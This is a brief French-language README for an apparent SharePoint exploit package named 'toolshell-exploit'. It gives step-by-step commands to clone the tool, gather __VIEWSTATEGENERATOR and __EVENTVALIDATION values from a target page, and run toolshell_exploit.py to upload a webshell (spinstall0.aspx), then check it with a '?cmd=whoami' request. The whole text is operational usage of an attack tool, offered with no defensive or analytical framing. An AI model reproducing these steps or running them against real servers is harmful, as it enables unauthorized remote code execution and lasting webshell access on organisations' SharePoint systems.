
Ce package permet :
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
Téléversez la webshell
Depuis une page SharePoint, vous pouvez accéder au code source de la page. Allez simplement dans l'onglet view source et, si disponible, vous obtiendrez ce qui suit, que vous pouvez copier :
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (un __VIEWSTATE actuel quelconque pour le contexte)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
Ceci téléverse spinstall0.aspx. Vérifiez : https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami